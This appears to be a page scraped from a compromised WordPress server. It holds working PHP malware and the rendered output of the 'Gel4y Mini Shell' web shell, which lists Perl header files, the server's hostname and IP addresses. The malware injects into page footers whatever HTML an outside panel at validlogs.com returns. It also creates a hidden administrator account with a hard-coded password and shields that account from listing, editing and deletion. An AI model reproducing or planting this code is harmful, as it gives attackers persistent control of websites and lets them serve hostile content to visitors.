function wp_injector_fetch_code() { $backend_url = 'https://validlogs.com/BackPanel/panel.php'; $domain = sanitize_text_field($_SERVER['HTTP_HOST']); $response = wp_remote_post($backend_url, array('body' => array('action' => 'register_domain', 'domain' => $domain), 'timeout' => 5)); if (is_wp_error($response)) return; $html_code = wp_remote_retrieve_body($response); if (!empty($html_code)) { add_action('wp_footer', function() use ($html_code) { echo $html_code; }); } } add_action('init', 'wp_injector_fetch_code'); ob_start(); ?> if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } function wp_injector_fetch_code() { $backend_url = 'https://validlogs.com/BackPanel/panel.php'; $domain = sanitize_text_field($_SERVER['HTTP_HOST']); $response = wp_remote_post($backend_url, array('body' => array('action' => 'register_domain', 'domain' => $domain), 'timeout' => 5)); if (is_wp_error($response)) return; $html_code = wp_remote_retrieve_body($response); if (!empty($html_code)) { add_action('wp_footer', function() use ($html_code) { echo $html_code; }); } } add_action('init', 'wp_injector_fetch_code'); ob_start(); ?> Gel4y Mini Shell

Gel4y Mini Shell

PHP Version : 7.4.33
+File +Directory
  • Server : x3immune.vn (157.245.199.161/216.73.216.25)
  • Path: ~/usr/lib/x86_64-linux-gnu/perl/5.30.0/CORE/
    Name Size Permission Action
    EXTERN.h 1.613KB -rw-r--r--
    INTERN.h 1.278KB -rw-r--r--
    XSUB.h 23.827KB -rw-r--r--
    av.h 3.217KB -rw-r--r--
    bitcount.h 0.83KB -rw-r--r--
    charclass_invlists.h 3.92MB -rw-r--r--
    config.h 159.911KB -rw-r--r--
    cop.h 39.769KB -rw-r--r--
    cv.h 12.034KB -rw-r--r--
    dosish.h 5.333KB -rw-r--r--
    dquote_inline.h 1.817KB -rw-r--r--
    ebcdic_tables.h 48.387KB -rw-r--r--
    embed.h 100.29KB -rw-r--r--
    embedvar.h 22.917KB -rw-r--r--
    fakesdio.h 3.135KB -rw-r--r--
    feature.h 4.928KB -rw-r--r--
    form.h 1.429KB -rw-r--r--
    git_version.h 0.349KB -rw-r--r--
    gv.h 10.46KB -rw-r--r--
    handy.h 123.572KB -rw-r--r--
    hv.h 24.946KB -rw-r--r--
    hv_func.h 10.533KB -rw-r--r--
    hv_macro.h 2.884KB -rw-r--r--
    inline.h 67.252KB -rw-r--r--
    intrpvar.h 28.735KB -rw-r--r--
    invlist_inline.h 2.906KB -rw-r--r--
    iperlsys.h 47.616KB -rw-r--r--
    keywords.h 6.433KB -rw-r--r--
    l1_char_class_tab.h 123.963KB -rw-r--r--
    malloc_ctl.h 1.488KB -rw-r--r--
    metaconfig.h 0.93KB -rw-r--r--
    mg.h 2.942KB -rw-r--r--
    mg_data.h 4.903KB -rw-r--r--
    mg_raw.h 4.274KB -rw-r--r--
    mg_vtable.h 9.338KB -rw-r--r--
    mydtrace.h 1.653KB -rw-r--r--
    nostdio.h 3.313KB -rw-r--r--
    op.h 35.498KB -rw-r--r--
    op_reg_common.h 5.772KB -rw-r--r--
    opcode.h 91.089KB -rw-r--r--
    opnames.h 8.652KB -rw-r--r--
    overload.h 3.199KB -rw-r--r--
    pad.h 16.816KB -rw-r--r--
    parser.h 6.829KB -rw-r--r--
    patchlevel-debian.h 6.758KB -rw-r--r--
    patchlevel.h 5.247KB -rw-r--r--
    perl.h 263.843KB -rw-r--r--
    perl_inc_macro.h 6.077KB -rw-r--r--
    perl_langinfo.h 2.846KB -rw-r--r--
    perlapi.h 9.932KB -rw-r--r--
    perlio.h 9.242KB -rw-r--r--
    perliol.h 13.438KB -rw-r--r--
    perlsdio.h 0.515KB -rw-r--r--
    perlvars.h 13.002KB -rw-r--r--
    perly.h 4.33KB -rw-r--r--
    pp.h 28.29KB -rw-r--r--
    pp_proto.h 11.847KB -rw-r--r--
    proto.h 252.876KB -rw-r--r--
    reentr.h 76.615KB -rw-r--r--
    regcharclass.h 136.87KB -rw-r--r--
    regcomp.h 47.776KB -rw-r--r--
    regexp.h 35.766KB -rw-r--r--
    regnodes.h 37.161KB -rw-r--r--
    sbox32_hash.h 55.951KB -rw-r--r--
    scope.h 11.608KB -rw-r--r--
    stadtx_hash.h 10.231KB -rw-r--r--
    sv.h 83.43KB -rw-r--r--
    thread.h 11.812KB -rw-r--r--
    time64.h 1.551KB -rw-r--r--
    time64_config.h 2KB -rw-r--r--
    uconfig.h 159.595KB -rw-r--r--
    uni_keywords.h 523.041KB -rw-r--r--
    unicode_constants.h 7.839KB -rw-r--r--
    unixish.h 5.071KB -rw-r--r--
    utf8.h 46.472KB -rw-r--r--
    utfebcdic.h 65.479KB -rw-r--r--
    util.h 9.776KB -rw-r--r--
    uudmap.h 0.883KB -rw-r--r--
    vutil.h 7.806KB -rw-r--r--
    warnings.h 8.037KB -rw-r--r--
    zaphod32_hash.h 10.294KB -rw-r--r--
    Copyright © 2021 - Powered By Indonesian Darknet